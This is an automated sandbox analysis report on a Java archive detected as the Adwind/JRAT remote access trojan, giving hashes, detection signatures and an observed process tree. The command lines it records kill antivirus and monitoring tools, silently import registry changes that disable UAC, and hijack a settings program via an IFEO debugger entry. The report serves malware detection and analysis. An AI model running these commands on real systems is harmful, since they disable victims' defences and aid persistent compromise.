Windows Analysis Report
NewOrder - P2D041197.jar

Overview

General Information

Sample name: NewOrder - P2D041197.jar
Analysis ID: 1427166
MD5: bc34f4e23dca52ed6425b46a3dcf5e95
SHA1: e82affa4fea489146e3deb803efdb561a394073f
SHA256: f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
Tags: Adwindjar
Infos:

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Java source code contains strings found in CrossRAT
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Processes Spawned by Java.EXE
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7324 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • java.exe (PID: 7388 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
      • icacls.exe (PID: 7440 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7484 cmdline: wscript C:\Users\user\zbrspjjraf.js MD5: FF00E0480075B095948000BDC66E81F0)
        • javaw.exe (PID: 7564 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt" MD5: 6E0F4F812AE02FBCB744A929E74A04B8)
          • java.exe (PID: 7620 cmdline: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7788 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cscript.exe (PID: 7844 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
            • cmd.exe (PID: 7964 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cscript.exe (PID: 8012 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
            • xcopy.exe (PID: 8120 cmdline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e MD5: 7E9B7CE496D09F70C072930940F9F02C)
              • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7712 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cscript.exe (PID: 7768 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 7896 cmdline: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cscript.exe (PID: 7940 cmdline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • xcopy.exe (PID: 8072 cmdline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7236 cmdline: cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5788 cmdline: taskkill /IM UserAccountControlSettings.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7264 cmdline: cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • regedit.exe (PID: 7408 cmdline: regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg MD5: BD63D72DB4FA96A1E0250B1D36B7A827)
          • taskkill.exe (PID: 8048 cmdline: taskkill /IM ProcessHacker.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8068 cmdline: taskkill /IM procexp.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 796 cmdline: taskkill /IM MSASCui.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1436 cmdline: taskkill /IM MsMpEng.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5308 cmdline: taskkill /IM MpUXSrv.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7348 cmdline: taskkill /IM MpCmdRun.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7444 cmdline: WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List MD5: E2DE6500DE1148C7F6027AD50AC8B891)
            • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 2504 cmdline: taskkill /IM NisSrv.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 4348 cmdline: taskkill /IM ConfigSecurityPolicy.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8000 cmdline: taskkill /IM procexp.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1608 cmdline: taskkill /IM wireshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5844 cmdline: taskkill /IM tshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 8104 cmdline: taskkill /IM text2pcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 5460 cmdline: taskkill /IM rawshark.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7264 cmdline: taskkill /IM mergecap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7968 cmdline: taskkill /IM editcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6160 cmdline: taskkill /IM dumpcap.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6856 cmdline: taskkill /IM capinfos.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 3524 cmdline: taskkill /IM mbam.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6192 cmdline: taskkill /IM mbamscheduler.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 6908 cmdline: taskkill /IM mbamservice.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 1004 cmdline: taskkill /IM AdAwareService.exe /T /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class | MAL_JRAT_Oct18_1 | Detects JRAT malware | Florian Roth
  • 0x36507:$x1: /JRat.class
  • 0x3af09:$x1: /JRat.class
C:\Users\user\AppData\Roaming\krmyqqmohp.txt | MAL_JRAT_Oct18_1 | Detects JRAT malware | Florian Roth
  • 0x37c41:$x1: /JRat.class
  • 0x76646:$x1: /JRat.class
C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security

Source | Rule | Description | Author | Strings
6.2.javaw.exe.73a90000.3.unpack | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security
7.2.java.exe.a744bf4.11.raw.unpack | JoeSecurity_AdWind_dll | Yara detected AdWind RAT's dll | Joe Security

        System Summary

        Source: File created | Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community | Data: EventID: 11, Image: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe, ProcessId: 7564, TargetFilename: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: Registry Key set | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Details: .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regedit.exe, ProcessId: 7408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes
        Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7712, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ProcessId: 7768, ProcessName: cscript.exe
        Source: Process started | Author: Andreas Hunkeler (@Karneades), Florian Roth | Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe
        Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7712, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs, ProcessId: 7768, ProcessName: cscript.exe
        Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe
        Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\regedit.exe, ProcessId: 7408, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe\debugger
        Source: Process started | Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali | Data: Command: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, CommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7620, ParentProcessName: java.exe, ProcessCommandLine: cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs, ProcessId: 7788, ProcessName: cmd.exe
        Source: Process started | Author: Michael Haag | Data: Command: wscript C:\Users\user\zbrspjjraf.js, CommandLine: wscript C:\Users\user\zbrspjjraf.js, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar" , ParentImage: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe, ParentProcessId: 7388, ParentProcessName: java.exe, ProcessCommandLine: wscript C:\Users\user\zbrspjjraf.js, ProcessId: 7484, ProcessName: wscript.exe
        No Snort rule has matched

        AV Detection

        Source: C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs | Avira: detection malicious, Label: VBS/Antiav.jre
        Source: C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs | Avira: detection malicious, Label: VBS/Agent.281
        Source: C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs | Avira: detection malicious, Label: VBS/Agent.281
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | Avira: detection malicious, Label: TR/Spy.Agent.lusda
        Source: C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs | Avira: detection malicious, Label: VBS/Antiav.jre
        Source: pnauco5.ddns.net | Virustotal: Detection: 5%
        Source: https://jrat.io | Virustotal: Detection: 6%
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | ReversingLabs: Detection: 85%
        Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll | Virustotal: Detection: 79%
        Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
        Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699563884.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: xcopy.exe, 00000015.00000003.1728816995.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbi source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb.. source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb** source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdbjj source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libzip\zip.pdb source: xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
